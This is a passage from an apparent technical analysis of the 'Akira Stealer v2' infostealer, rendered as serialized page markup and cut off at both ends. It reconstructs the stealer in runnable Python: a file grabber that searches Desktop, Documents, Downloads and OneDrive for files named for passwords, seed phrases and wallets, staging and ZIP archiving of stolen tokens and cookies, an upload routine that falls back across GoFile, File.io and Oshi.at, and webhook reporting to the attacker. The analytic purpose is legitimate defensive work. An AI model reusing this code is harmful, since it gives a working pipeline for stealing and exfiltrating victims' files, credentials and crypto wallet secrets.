headers:",[1545,15375,15377],{"className":10501,"code":15376,"language":10503,"meta":863,"style":863},"webhook_payload = {\n \"embeds\": [{\n \"title\": f\"💉 Infected {self.computerName}/{self.username} | {self.ip} {flag}\",\n \"description\": description + \"\\n```⚙️ System Info\\n\" + self.system_info + \"```\",\n \"fields\": [...]\n }]\n}\nrequests.post(self.webhook_url, json=webhook_payload)\n",[1524,15378,15379,15384,15389,15394,15399,15404,15409,15413],{"__ignoreMap":863},[1588,15380,15381],{"class":1590,"line":1591},[1588,15382,15383],{},"webhook_payload = {\n",[1588,15385,15386],{"class":1590,"line":864},[1588,15387,15388],{}," \"embeds\": [{\n",[1588,15390,15391],{"class":1590,"line":1814},[1588,15392,15393],{}," \"title\": f\"💉 Infected {self.computerName}/{self.username} | {self.ip} {flag}\",\n",[1588,15395,15396],{"class":1590,"line":1831},[1588,15397,15398],{}," \"description\": description + \"\\n```⚙️ System Info\\n\" + self.system_info + \"```\",\n",[1588,15400,15401],{"class":1590,"line":2135},[1588,15402,15403],{}," \"fields\": [...]\n",[1588,15405,15406],{"class":1590,"line":2141},[1588,15407,15408],{}," }]\n",[1588,15410,15411],{"class":1590,"line":2147},[1588,15412,8430],{},[1588,15414,15415],{"class":1590,"line":2153},[1588,15416,15417],{},"requests.post(self.webhook_url, json=webhook_payload)\n",[2738,15419,15420,15426],{},[2741,15421,15422,15425],{},[1736,15423,15424],{},"Flag Emoji",": Derived from ISO country code.",[2741,15427,15428,15431],{},[1736,15429,15430],{},"Fields",": Include counts of stolen passwords, cookies, etc., but the system info is in the embed description for immediate context.",[806,15433,15434,15437],{},[1736,15435,15436],{},"Summary:","\nSystem profiling in Akira Stealer v2 gathers comprehensive host and network data via WMI commands, environment variables, and IP geolocation. Coupled with VM detection and tool-killing routines, this ensures the attacker has a full snapshot of the compromised environment, enhancing targeted follow-up actions and filtering out analysis sandboxes.",[810,15439,15441,15442,2772],{"id":15440},"_711-file-grabber-class-utilssteal_files","7.11 File Grabber (Class: ",[1524,15443,15444],{},"Utils.steal_files",[806,15446,1536],{},[806,15448,15449],{},"Beyond browser data and tokens, Akira also attempts to extract valuable user-generated content—such as documents, spreadsheets, private notes, and cryptographic key files. The File Grabber module is responsible for this task. It operates by scanning high-value directories for common file types and patterns, then silently adding them to the exfiltration bundle. What makes this module especially dangerous is its simplicity and focus: it doesn’t attempt to crawl the entire file system. Instead, it targets specific, high-probability locations where sensitive files are typically stored. These include the Desktop, Documents, Downloads, and OneDrive directories—each relative to the user's home path. This focused approach improves both speed and stealth, reducing the likelihood of detection during the scan. It also avoids alerting the user by not accessing system or protected directories. Once files of interest are located, they are copied into a temporary folder, optionally renamed or grouped, and later compressed into the final ZIP archive that’s uploaded in the exfiltration phase.",[1671,15451,15453],{"id":15452},"_7111-target-directories-enumeration","7.11.1 Target Directories Enumeration",[806,15455,1677],{},[806,15457,15458],{},"The stealer focuses on four high-yield folders:",[1545,15460,15462],{"className":10501,"code":15461,"language":10503,"meta":863,"style":863},"searchFolders = [\n \"Desktop\",\n \"Documents\",\n \"Downloads\",\n \"OneDrive\"\n]\n",[1524,15463,15464,15469,15474,15479,15484,15489],{"__ignoreMap":863},[1588,15465,15466],{"class":1590,"line":1591},[1588,15467,15468],{},"searchFolders = [\n",[1588,15470,15471],{"class":1590,"line":864},[1588,15472,15473],{}," \"Desktop\",\n",[1588,15475,15476],{"class":1590,"line":1814},[1588,15477,15478],{}," \"Documents\",\n",[1588,15480,15481],{"class":1590,"line":1831},[1588,15482,15483],{}," \"Downloads\",\n",[1588,15485,15486],{"class":1590,"line":2135},[1588,15487,15488],{}," \"OneDrive\"\n",[1588,15490,15491],{"class":1590,"line":2141},[1588,15492,13933],{},[806,15494,15495],{},"Each folder is interpreted relative to the victim’s home directory:",[1545,15497,15499],{"className":10501,"code":15498,"language":10503,"meta":863,"style":863},"for folder in searchFolders:\n current_path = os.path.join(os.environ['USERPROFILE'], folder)\n if os.path.exists(current_path):\n # proceed to scan\n",[1524,15500,15501,15506,15511,15516],{"__ignoreMap":863},[1588,15502,15503],{"class":1590,"line":1591},[1588,15504,15505],{},"for folder in searchFolders:\n",[1588,15507,15508],{"class":1590,"line":864},[1588,15509,15510],{}," current_path = os.path.join(os.environ['USERPROFILE'], folder)\n",[1588,15512,15513],{"class":1590,"line":1814},[1588,15514,15515],{}," if os.path.exists(current_path):\n",[1588,15517,15518],{"class":1590,"line":1831},[1588,15519,15520],{}," # proceed to scan\n",[1671,15522,15524],{"id":15523},"_7112-keyword-extension-filtering","7.11.2 Keyword & Extension Filtering",[806,15526,1677],{},[806,15528,15529],{},[1736,15530,15531],{},"Keyword List",[806,15533,15534],{},"A predefined set of substrings guides file selection. Only filenames containing at least one keyword are considered:",[1545,15536,15538],{"className":10501,"code":15537,"language":10503,"meta":863,"style":863},"keywordsFiles = [\n \"passw\", \"seed\", \"mnemo\", \"phrase\", \"login\", \"wallet\",\n \"crypto\", \"token\", \"backup\", \"secret\", \"account\"\n]\n",[1524,15539,15540,15545,15550,15555],{"__ignoreMap":863},[1588,15541,15542],{"class":1590,"line":1591},[1588,15543,15544],{},"keywordsFiles = [\n",[1588,15546,15547],{"class":1590,"line":864},[1588,15548,15549],{}," \"passw\", \"seed\", \"mnemo\", \"phrase\", \"login\", \"wallet\",\n",[1588,15551,15552],{"class":1590,"line":1814},[1588,15553,15554],{}," \"crypto\", \"token\", \"backup\", \"secret\", \"account\"\n",[1588,15556,15557],{"class":1590,"line":1831},[1588,15558,13933],{},[2738,15560,15561,15577],{},[2741,15562,15563,15566,15567,15570,15571,5611,15574,2786],{},[1736,15564,15565],{},"Partial Matches",": Keywords like ",[1524,15568,15569],{},"passw"," capture both ",[1524,15572,15573],{},"passwords.txt",[1524,15575,15576],{},"passw_backup.docx",[2741,15578,15579,15582],{},[1736,15580,15581],{},"Broad Coverage",": Encompasses authentication, wallet, crypto, and token-related terms.",[1671,15584,15586],{"id":15585},"_7113-allowed-file-types","7.11.3 Allowed File Types",[806,15588,1677],{},[806,15590,15591],{},"To minimize noise, a whitelist of extensions is enforced:",[1545,15593,15595],{"className":10501,"code":15594,"language":10503,"meta":863,"style":863},"allowed_extensions = [\n \".txt\", \".doc\", \".docx\", \".pdf\", \".csv\", \".xls\", \".xlsx\",\n \".jpg\", \".png\"\n]\n",[1524,15596,15597,15602,15607,15612],{"__ignoreMap":863},[1588,15598,15599],{"class":1590,"line":1591},[1588,15600,15601],{},"allowed_extensions = [\n",[1588,15603,15604],{"class":1590,"line":864},[1588,15605,15606],{}," \".txt\", \".doc\", \".docx\", \".pdf\", \".csv\", \".xls\", \".xlsx\",\n",[1588,15608,15609],{"class":1590,"line":1814},[1588,15610,15611],{}," \".jpg\", \".png\"\n",[1588,15613,15614],{"class":1590,"line":1831},[1588,15615,13933],{},[1671,15617,15619],{"id":15618},"_7113-size-constraint","7.11.3 Size Constraint",[806,15621,1677],{},[806,15623,15624],{},"Files larger than 2 megabytes are skipped to optimize exfiltration speed and avoid large transfers:",[1545,15626,15628],{"className":10501,"code":15627,"language":10503,"meta":863,"style":863},"file_size_mb = os.path.getsize(full_path) / (1024 * 1024)\nif file_size_mb \u003C= 2:\n # eligible for copy\n",[1524,15629,15630,15635,15640],{"__ignoreMap":863},[1588,15631,15632],{"class":1590,"line":1591},[1588,15633,15634],{},"file_size_mb = os.path.getsize(full_path) / (1024 * 1024)\n",[1588,15636,15637],{"class":1590,"line":864},[1588,15638,15639],{},"if file_size_mb \u003C= 2:\n",[1588,15641,15642],{"class":1590,"line":1814},[1588,15643,15644],{}," # eligible for copy\n",[1671,15646,15648],{"id":15647},"_7114-recursive-scanning-copy-logic","7.11.4 Recursive Scanning & Copy Logic",[806,15650,1677],{},[806,15652,15653],{},"Once the high-value directories have been identified, Akira initiates a recursive scanning routine to traverse subfolders and locate files matching specific keywords and extensions. This phase is built for precision and stealth: only files that match pre-defined criteria—such as filenames containing sensitive keywords and approved filetypes—are considered. The logic ensures that only relevant, user-generated content is exfiltrated. It ignores system files, caches, and binaries, and limits the size of any single file to 2 MB to reduce upload size and detection risk. This scanning method is silent, efficient, and optimized for stealthy data theft in real-world environments. By copying matching files into a staging folder and maintaining a list of what was taken, Akira prepares the content for bundling and exfiltration—while minimizing duplication and operational noise.",[806,15655,15656,15657,15660],{},"The core routine ",[1524,15658,15659],{},"steal_files()"," operates as follows:",[1545,15662,15664],{"className":10501,"code":15663,"language":10503,"meta":863,"style":863},"@staticmethod\ndef steal_files():\n stolen_files = set()\n temp_folder = Utils.get_temp_folder()\n\n for folder in searchFolders:\n current_path = os.path.join(os.environ['USERPROFILE'], folder)\n if os.path.exists(current_path):\n for root, _, files in os.walk(current_path):\n for file in files:\n lower = file.lower()\n # Keyword check\n if any(keyword in lower for keyword in keywordsFiles):\n ext = os.path.splitext(lower)[1]\n # Extension and size check\n if ext in allowed_extensions and os.path.getsize(os.path.join(root, file)) \u003C= 2 * 1024 * 1024:\n # Prepare destination\n files_dir = os.path.join(temp_folder, \"Files\")\n os.makedirs(files_dir, exist_ok=True)\n shutil.copy(os.path.join(root, file), os.path.join(files_dir, file))\n stolen_files.add(file)\n data.stolen_files.extend(stolen_files)\n",[1524,15665,15666,15670,15675,15680,15685,15689,15694,15699,15704,15709,15714,15719,15724,15729,15734,15739,15744,15749,15754,15759,15764,15769],{"__ignoreMap":863},[1588,15667,15668],{"class":1590,"line":1591},[1588,15669,10991],{},[1588,15671,15672],{"class":1590,"line":864},[1588,15673,15674],{},"def steal_files():\n",[1588,15676,15677],{"class":1590,"line":1814},[1588,15678,15679],{}," stolen_files = set()\n",[1588,15681,15682],{"class":1590,"line":1831},[1588,15683,15684],{}," temp_folder = Utils.get_temp_folder()\n",[1588,15686,15687],{"class":1590,"line":2135},[1588,15688,9865],{"emptyLinePlaceholder":508},[1588,15690,15691],{"class":1590,"line":2141},[1588,15692,15693],{}," for folder in searchFolders:\n",[1588,15695,15696],{"class":1590,"line":2147},[1588,15697,15698],{}," current_path = os.path.join(os.environ['USERPROFILE'], folder)\n",[1588,15700,15701],{"class":1590,"line":2153},[1588,15702,15703],{}," if os.path.exists(current_path):\n",[1588,15705,15706],{"class":1590,"line":2159},[1588,15707,15708],{}," for root, _, files in os.walk(current_path):\n",[1588,15710,15711],{"class":1590,"line":2165},[1588,15712,15713],{}," for file in files:\n",[1588,15715,15716],{"class":1590,"line":11039},[1588,15717,15718],{}," lower = file.lower()\n",[1588,15720,15721],{"class":1590,"line":11045},[1588,15722,15723],{}," # Keyword check\n",[1588,15725,15726],{"class":1590,"line":11051},[1588,15727,15728],{}," if any(keyword in lower for keyword in keywordsFiles):\n",[1588,15730,15731],{"class":1590,"line":11057},[1588,15732,15733],{}," ext = os.path.splitext(lower)[1]\n",[1588,15735,15736],{"class":1590,"line":11063},[1588,15737,15738],{}," # Extension and size check\n",[1588,15740,15741],{"class":1590,"line":11069},[1588,15742,15743],{}," if ext in allowed_extensions and os.path.getsize(os.path.join(root, file)) \u003C= 2 * 1024 * 1024:\n",[1588,15745,15746],{"class":1590,"line":11075},[1588,15747,15748],{}," # Prepare destination\n",[1588,15750,15751],{"class":1590,"line":11081},[1588,15752,15753],{}," files_dir = os.path.join(temp_folder, \"Files\")\n",[1588,15755,15756],{"class":1590,"line":11087},[1588,15757,15758],{}," os.makedirs(files_dir, exist_ok=True)\n",[1588,15760,15761],{"class":1590,"line":11093},[1588,15762,15763],{}," shutil.copy(os.path.join(root, file), os.path.join(files_dir, file))\n",[1588,15765,15766],{"class":1590,"line":11099},[1588,15767,15768],{}," stolen_files.add(file)\n",[1588,15770,15771],{"class":1590,"line":11105},[1588,15772,15773],{}," data.stolen_files.extend(stolen_files)\n",[806,15775,15776],{},[1736,15777,15778],{},"Key points:",[4351,15780,15781,15789,15798,15807,15813],{},[2741,15782,15783,15788],{},[1736,15784,15785],{},[1524,15786,15787],{},"os.walk",": Recursively descends into subdirectories.",[2741,15790,15791,15794,15795,2786],{},[1736,15792,15793],{},"Case-insensitive matching",": Filenames are normalized via ",[1524,15796,15797],{},"lower()",[2741,15799,15800,15803,15804,15806],{},[1736,15801,15802],{},"Atomic copy",": Uses ",[1524,15805,13799],{}," to preserve file content.",[2741,15808,15809,15812],{},[1736,15810,15811],{},"Set of stolen filenames",": Prevents duplicate copies when the same file appears twice.",[2741,15814,15815,2545,15820,15823],{},[1736,15816,15817,15818],{},"Integration with ",[1524,15819,15076],{},[1524,15821,15822],{},"data.stolen_files"," accumulates the stolen file list for later reporting.",[1671,15825,15827],{"id":15826},"_7115-archiving-and-exfiltration","7.11.5 Archiving and Exfiltration",[806,15829,1677],{},[806,15831,15832,15833,15835],{},"After collection, the ",[1524,15834,14281],{}," folder is zipped and dispatched:",[1545,15837,15839],{"className":10501,"code":15838,"language":10503,"meta":863,"style":863},"# Archive\nUtils.zip_client_file() # creates CLIENT.zip from temp_folder\n\n# Upload & Notify\nakira.sendFilesTG(Utils.get_temp_folder(), startup)\nhook.sendFilesTG(Utils.get_temp_folder(), startup)\n",[1524,15840,15841,15846,15851,15855,15860,15865],{"__ignoreMap":863},[1588,15842,15843],{"class":1590,"line":1591},[1588,15844,15845],{},"# Archive\n",[1588,15847,15848],{"class":1590,"line":864},[1588,15849,15850],{},"Utils.zip_client_file() # creates CLIENT.zip from temp_folder\n",[1588,15852,15853],{"class":1590,"line":1814},[1588,15854,9865],{"emptyLinePlaceholder":508},[1588,15856,15857],{"class":1590,"line":1831},[1588,15858,15859],{},"# Upload & Notify\n",[1588,15861,15862],{"class":1590,"line":2135},[1588,15863,15864],{},"akira.sendFilesTG(Utils.get_temp_folder(), startup)\n",[1588,15866,15867],{"class":1590,"line":2141},[1588,15868,15869],{},"hook.sendFilesTG(Utils.get_temp_folder(), startup)\n",[2738,15871,15872,15887],{},[2741,15873,15874,15879,15880,2289,15882,2289,15884,9904],{},[1736,15875,15876],{},[1524,15877,15878],{},"zip_client_file()",": Compresses the entire temp directory, including ",[1524,15881,14281],{},[1524,15883,12335],{},[1524,15885,15886],{},"Passwords",[2741,15888,15889,15893,15894],{},[1736,15890,15891],{},[1524,15892,15057],{},": Posts the download link via Telegram or Discord webhook, listing each stolen filename:",[1545,15895,15897],{"className":10501,"code":15896,"language":10503,"meta":863,"style":863},"fields.append({\n\"name\": \"📂 Files\",\n\"value\": \"`\" + \"\\n\".join(data.stolen_files) + \"`\",\n\"inline\": False\n})\n",[1524,15898,15899,15904,15909,15914,15919],{"__ignoreMap":863},[1588,15900,15901],{"class":1590,"line":1591},[1588,15902,15903],{},"fields.append({\n",[1588,15905,15906],{"class":1590,"line":864},[1588,15907,15908],{},"\"name\": \"📂 Files\",\n",[1588,15910,15911],{"class":1590,"line":1814},[1588,15912,15913],{},"\"value\": \"`\" + \"\\n\".join(data.stolen_files) + \"`\",\n",[1588,15915,15916],{"class":1590,"line":1831},[1588,15917,15918],{},"\"inline\": False\n",[1588,15920,15921],{"class":1590,"line":2135},[1588,15922,15923],{},"})\n",[806,15925,15926],{},[1736,15927,15928],{},"Conclusion:",[806,15930,15931],{},"The File Grabber in Akira Stealer v2 systematically hunts for sensitive documents using keyword and extension filters, respects a 2 MB size cap for efficiency, and consolidates stolen items into an archive. Its design ensures both breadth (multiple folders) and precision (targeted filters), making it one of the most impactful stages of the malware’s lifecycle.",[810,15933,15935],{"id":15934},"_712-exfiltration-strategy","7.12 Exfiltration Strategy",[806,15937,1536],{},[806,15939,15940],{},"The exfiltration module handles harvested tokens and additional artifacts (cookies, autofills, logs) by staging them in a structured directory, compressing into an archive, uploading to multiple online file hosts, and sending detailed webhook notifications. This section deconstructs each step with file paths, domain endpoints, and code references for full traceability.",[1671,15942,15944],{"id":15943},"_7121-directory-layout-filenames","7.12.1 Directory Layout & Filenames",[806,15946,1677],{},[806,15948,15949],{},"Akira organizes all collected artifacts into a clean and hierarchical temporary directory structure. This design allows for efficient packaging and easy post-exfiltration review by the attacker. Each data category—such as Tokens, Cookies, Passwords, or Screenshots—is stored in its own subfolder under a root path named after the victim’s computer (e.g., DESKTOP1234). This structured layout ensures clarity, minimizes duplication, and streamlines the archiving and upload process. It also makes automated parsing or manual inspection much easier on the attacker side.",[1545,15951,15954],{"className":15952,"code":15953,"language":916},[1548],"C:\\Users\\User\\AppData\\Local\\Temp\\DESKTOP1234\\\n├─ Tokens\\\n│ ├ token_ab12cd34.txt\n│ └ token_ef56gh78.txt\n├─ Cookies\\\n│ ├ Chrome_Cookies.txt\n│ └ Discord_Cookies.txt\n├─ Autofill\\\n├─ Passwords\\\n├─ Logs\\\n└─ Screenshots\\\n",[1524,15955,15953],{"__ignoreMap":863},[1671,15957,15959],{"id":15958},"_7122-token-artifact-staging","7.12.2 Token & Artifact Staging",[806,15961,1677],{},[806,15963,15964],{},"Before exfiltration, Akira stages all relevant artifacts in the corresponding subfolders. Token values, for instance, are written into individual .txt files to facilitate quick scanning and validation. Cookies, autofill entries, and passwords are similarly written into structured text files named by browser. This step standardizes the data layout, enabling automated tooling to track what was harvested. It also ensures that the zip archive later reflects a predictable and attacker-friendly format, regardless of which modules were triggered.",[1545,15966,15968],{"className":10501,"code":15967,"language":10503,"meta":863,"style":863},"import os, shutil\n# Constants\nTMP = os.getenv('TEMP')\nROOT = os.path.join(TMP, os.getenv('COMPUTERNAME'))\n# Prepare structure\nfor sub in ['Tokens','Cookies','Autofill','Passwords','Logs','Screenshots']:\n os.makedirs(os.path.join(ROOT, sub), exist_ok=True)\n# Save token\nwith open(os.path.join(ROOT, 'Tokens', f'token_{token[:8]}.txt'), 'w') as f:\n f.write(token)\n",[1524,15969,15970,15975,15980,15985,15990,15995,16000,16005,16010,16015],{"__ignoreMap":863},[1588,15971,15972],{"class":1590,"line":1591},[1588,15973,15974],{},"import os, shutil\n",[1588,15976,15977],{"class":1590,"line":864},[1588,15978,15979],{},"# Constants\n",[1588,15981,15982],{"class":1590,"line":1814},[1588,15983,15984],{},"TMP = os.getenv('TEMP')\n",[1588,15986,15987],{"class":1590,"line":1831},[1588,15988,15989],{},"ROOT = os.path.join(TMP, os.getenv('COMPUTERNAME'))\n",[1588,15991,15992],{"class":1590,"line":2135},[1588,15993,15994],{},"# Prepare structure\n",[1588,15996,15997],{"class":1590,"line":2141},[1588,15998,15999],{},"for sub in ['Tokens','Cookies','Autofill','Passwords','Logs','Screenshots']:\n",[1588,16001,16002],{"class":1590,"line":2147},[1588,16003,16004],{}," os.makedirs(os.path.join(ROOT, sub), exist_ok=True)\n",[1588,16006,16007],{"class":1590,"line":2153},[1588,16008,16009],{},"# Save token\n",[1588,16011,16012],{"class":1590,"line":2159},[1588,16013,16014],{},"with open(os.path.join(ROOT, 'Tokens', f'token_{token[:8]}.txt'), 'w') as f:\n",[1588,16016,16017],{"class":1590,"line":2165},[1588,16018,16019],{}," f.write(token)\n",[2738,16021,16022,16025],{},[2741,16023,16024],{},"Tokens saved in separate small text files for quick inspection.",[2741,16026,16027,16028,16031,16032,2786],{},"Cookie dumps from ",[1524,16029,16030],{},"Chromium.GetCookies()"," written to ",[1524,16033,16034],{},"{Browser}_Cookies.txt",[1671,16036,16038],{"id":16037},"_7133-zip-archive-creation","7.13.3 ZIP Archive Creation",[806,16040,1677],{},[806,16042,16043,16044],{},"Once staging is complete, Akira compresses the entire directory into a single ZIP archive. The archive filename follows a consistent naming convention: ",[16045,16046,16047,16048],"computer-name",{},"_",[16049,16050,16051],"timestamp",{},".zip, using the host’s machine name and a UTC timestamp in ISO 8601 format. This ensures both uniqueness and chronological traceability. By walking the entire staging directory recursively, every file is preserved in its relative structure within the ZIP. This format simplifies bulk retrieval and inspection by attackers, especially if hundreds of victims are compromised in parallel.",[1545,16053,16055],{"className":10501,"code":16054,"language":10503,"meta":863,"style":863},"import zipfile, datetime\n\ndef create_archive(root_dir: str) -> str:\n ts = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')\n zip_name = os.path.basename(root_dir) + f'_{ts}.zip'\n zip_path = os.path.join(os.path.dirname(root_dir), zip_name)\n with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zf:\n for dirpath, _, files in os.walk(root_dir):\n for fname in files:\n full = os.path.join(dirpath, fname)\n rel = os.path.relpath(full, root_dir)\n zf.write(full, rel)\n return zip_path\n",[1524,16056,16057,16062,16066,16071,16076,16081,16086,16091,16096,16101,16106,16111,16116],{"__ignoreMap":863},[1588,16058,16059],{"class":1590,"line":1591},[1588,16060,16061],{},"import zipfile, datetime\n",[1588,16063,16064],{"class":1590,"line":864},[1588,16065,9865],{"emptyLinePlaceholder":508},[1588,16067,16068],{"class":1590,"line":1814},[1588,16069,16070],{},"def create_archive(root_dir: str) -> str:\n",[1588,16072,16073],{"class":1590,"line":1831},[1588,16074,16075],{}," ts = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')\n",[1588,16077,16078],{"class":1590,"line":2135},[1588,16079,16080],{}," zip_name = os.path.basename(root_dir) + f'_{ts}.zip'\n",[1588,16082,16083],{"class":1590,"line":2141},[1588,16084,16085],{}," zip_path = os.path.join(os.path.dirname(root_dir), zip_name)\n",[1588,16087,16088],{"class":1590,"line":2147},[1588,16089,16090],{}," with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zf:\n",[1588,16092,16093],{"class":1590,"line":2153},[1588,16094,16095],{}," for dirpath, _, files in os.walk(root_dir):\n",[1588,16097,16098],{"class":1590,"line":2159},[1588,16099,16100],{}," for fname in files:\n",[1588,16102,16103],{"class":1590,"line":2165},[1588,16104,16105],{}," full = os.path.join(dirpath, fname)\n",[1588,16107,16108],{"class":1590,"line":11039},[1588,16109,16110],{}," rel = os.path.relpath(full, root_dir)\n",[1588,16112,16113],{"class":1590,"line":11045},[1588,16114,16115],{}," zf.write(full, rel)\n",[1588,16117,16118],{"class":1590,"line":11051},[1588,16119,16120],{}," return zip_path\n",[2738,16122,16123],{},[2741,16124,16125,16126,16129],{},"Archive named ",[1524,16127,16128],{},"DESKTOP1234_20250505T123456Z.zip"," for host coherence.",[806,16131,16132],{},[1736,16133,16134],{},"ZIP Filename Convention",[806,16136,16137],{},"The archive is named using the compromised host’s computer name followed by a UTC timestamp in ISO format, ensuring uniqueness and chronological order.",[1545,16139,16141],{"className":10501,"code":16140,"language":10503,"meta":863,"style":863},"import datetime, os\n\ndef create_archive(root_dir: str) -> str:\n # Generate UTC timestamp in YYYYMMDDThhmmssZ format\n ts = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')\n # Construct ZIP filename: \u003CComputerName>_\u003CTimestamp>.zip\n zip_name = os.path.basename(root_dir) + f'_{ts}.zip'\n zip_path = os.path.join(os.path.dirname(root_dir), zip_name)\n return zip_path\n",[1524,16142,16143,16148,16152,16156,16161,16165,16170,16174,16178],{"__ignoreMap":863},[1588,16144,16145],{"class":1590,"line":1591},[1588,16146,16147],{},"import datetime, os\n",[1588,16149,16150],{"class":1590,"line":864},[1588,16151,9865],{"emptyLinePlaceholder":508},[1588,16153,16154],{"class":1590,"line":1814},[1588,16155,16070],{},[1588,16157,16158],{"class":1590,"line":1831},[1588,16159,16160],{}," # Generate UTC timestamp in YYYYMMDDThhmmssZ format\n",[1588,16162,16163],{"class":1590,"line":2135},[1588,16164,16075],{},[1588,16166,16167],{"class":1590,"line":2141},[1588,16168,16169],{}," # Construct ZIP filename: \u003CComputerName>_\u003CTimestamp>.zip\n",[1588,16171,16172],{"class":1590,"line":2147},[1588,16173,16080],{},[1588,16175,16176],{"class":1590,"line":2153},[1588,16177,16085],{},[1588,16179,16180],{"class":1590,"line":2159},[1588,16181,16120],{},[806,16183,16137],{},[1671,16185,16187],{"id":16186},"_7144-upload-workflow","7.14.4 Upload Workflow",[806,16189,1677],{},[806,16191,16192],{},"Akira uses a three-tier upload strategy to maximize the chance of successful data exfiltration. It first attempts to upload the archive to GoFile.io using their public API, which returns a download link. If GoFile is unavailable or blocked, it falls back to File.io and then Oshi.at, ensuring the data is always transferred. These services provide anonymous, short-lived hosting, which makes takedown and traceability difficult. The script captures the final download URL and prepares it for webhook delivery.",[4351,16194,16195,16227,16254],{},[2741,16196,16197,16200],{},[1736,16198,16199],{},"Primary: GoFile.io",[2738,16201,16202,16210,16218],{},[2741,16203,16204,2545,16207],{},[1736,16205,16206],{},"API to fetch servers",[1524,16208,16209],{},"GET https://api.gofile.io/servers",[2741,16211,16212,2545,16215],{},[1736,16213,16214],{},"Upload endpoint",[1524,16216,16217],{},"POST https://\u003Cserver>.gofile.io/contents/uploadfile",[2741,16219,16220,2545,16223,16226],{},[1736,16221,16222],{},"Response field",[1524,16224,16225],{},"data.downloadPage"," contains final URL.",[2741,16228,16229,16232],{},[1736,16230,16231],{},"Fallback #1: File.io",[2738,16233,16234,16244],{},[2741,16235,16236,2545,16238,7297,16241],{},[1736,16237,16214],{},[1524,16239,16240],{},"POST https://file.io/",[1524,16242,16243],{},"files={'file': open(...)}",[2741,16245,16246,16249,16250,16253],{},[1736,16247,16248],{},"Response",": JSON ",[1524,16251,16252],{},"link"," field.",[2741,16255,16256,16259],{},[1736,16257,16258],{},"Fallback #2: Oshi.at",[2738,16260,16261,16275],{},[2741,16262,16263,2545,16265,7297,16268,16271,16272,2786],{},[1736,16264,16214],{},[1524,16266,16267],{},"POST http://oshi.at/",[1524,16269,16270],{},"files[]"," and parameters ",[1524,16273,16274],{},"expire=43200, autodestroy=0",[2741,16276,16277,16279,16280,2786],{},[1736,16278,16248],{},": Plain text containing ",[1524,16281,16282],{},"DL: \u003Curl>",[806,16284,16285],{},[1736,16286,16287],{},"Implementation Snippet:",[1545,16289,16291],{"className":10501,"code":16290,"language":10503,"meta":863,"style":863},"import requests\n\ndef upload_with_fallback(zip_path):\n # GoFile\n try:\n servers = requests.get('https://api.gofile.io/servers', timeout=10).json()['data']['servers']\n for srv in servers:\n try:\n r = requests.post(\n f'https://{srv}.gofile.io/contents/uploadfile',\n files={'file': open(zip_path,'rb')}, timeout=20)\n url = r.json()['data']['downloadPage']\n if url: return url\n except: continue\n except: pass\n # File.io\n try:\n r = requests.post('https://file.io/', files={'file': open(zip_path,'rb')}, timeout=20)\n return r.json().get('link','')\n except: pass\n # Oshi.at\n try:\n text = requests.post('http://oshi.at/', files={'files[]': open(zip_path,'rb')}, data={'expire':'43200'}).text\n return text.split('DL: ')[1].strip()\n except: pass\n return ''\n",[1524,16292,16293,16298,16302,16307,16312,16316,16321,16326,16331,16336,16341,16346,16351,16356,16361,16366,16371,16375,16380,16385,16389,16394,16398,16403,16408,16412],{"__ignoreMap":863},[1588,16294,16295],{"class":1590,"line":1591},[1588,16296,16297],{},"import requests\n",[1588,16299,16300],{"class":1590,"line":864},[1588,16301,9865],{"emptyLinePlaceholder":508},[1588,16303,16304],{"class":1590,"line":1814},[1588,16305,16306],{},"def upload_with_fallback(zip_path):\n",[1588,16308,16309],{"class":1590,"line":1831},[1588,16310,16311],{}," # GoFile\n",[1588,16313,16314],{"class":1590,"line":2135},[1588,16315,11154],{},[1588,16317,16318],{"class":1590,"line":2141},[1588,16319,16320],{}," servers = requests.get('https://api.gofile.io/servers', timeout=10).json()['data']['servers']\n",[1588,16322,16323],{"class":1590,"line":2147},[1588,16324,16325],{}," for srv in servers:\n",[1588,16327,16328],{"class":1590,"line":2153},[1588,16329,16330],{}," try:\n",[1588,16332,16333],{"class":1590,"line":2159},[1588,16334,16335],{}," r = requests.post(\n",[1588,16337,16338],{"class":1590,"line":2165},[1588,16339,16340],{}," f'https://{srv}.gofile.io/contents/uploadfile',\n",[1588,16342,16343],{"class":1590,"line":11039},[1588,16344,16345],{}," files={'file': open(zip_path,'rb')}, timeout=20)\n",[1588,16347,16348],{"class":1590,"line":11045},[1588,16349,16350],{}," url = r.json()['data']['downloadPage']\n",[1588,16352,16353],{"class":1590,"line":11051},[1588,16354,16355],{}," if url: return url\n",[1588,16357,16358],{"class":1590,"line":11057},[1588,16359,16360],{}," except: continue\n",[1588,16362,16363],{"class":1590,"line":11063},[1588,16364,16365],{}," except: pass\n",[1588,16367,16368],{"class":1590,"line":11069},[1588,16369,16370],{}," # File.io\n",[1588,16372,16373],{"class":1590,"line":11075},[1588,16374,11154],{},[1588,16376,16377],{"class":1590,"line":11081},[1588,16378,16379],{}," r = requests.post('https://file.io/', files={'file': open(zip_path,'rb')}, timeout=20)\n",[1588,16381,16382],{"class":1590,"line":11087},[1588,16383,16384],{}," return r.json().get('link','')\n",[1588,16386,16387],{"class":1590,"line":11093},[1588,16388,16365],{},[1588,16390,16391],{"class":1590,"line":11099},[1588,16392,16393],{}," # Oshi.at\n",[1588,16395,16396],{"class":1590,"line":11105},[1588,16397,11154],{},[1588,16399,16400],{"class":1590,"line":11111},[1588,16401,16402],{}," text = requests.post('http://oshi.at/', files={'files[]': open(zip_path,'rb')}, data={'expire':'43200'}).text\n",[1588,16404,16405],{"class":1590,"line":11117},[1588,16406,16407],{}," return text.split('DL: ')[1].strip()\n",[1588,16409,16410],{"class":1590,"line":11123},[1588,16411,16365],{},[1588,16413,16414],{"class":1590,"line":11790},[1588,16415,16416],{}," return ''\n",[1671,16418,16420],{"id":16419},"_7155-webhook-alerts-attacker-retrieval-analyst-visibility-limits","7.15.5 Webhook Alerts, Attacker Retrieval & Analyst Visibility Limits",[806,16422,1677],{},[806,16424,16425],{},"After uploading the ZIP archive, Akira sends a webhook notification—typically to Discord or Telegram—with a structured embed containing detailed information: number of stolen tokens, cookie count, file size, and a clickable download link. This gives attackers immediate feedback and retrieval access. To ensure reliability, a plaintext fallback message is also sent, containing just the archive link. This redundancy guarantees delivery, even if the embed is blocked by the platform or filtered. From the defender’s perspective, these communications are often invisible unless outbound network monitoring is in 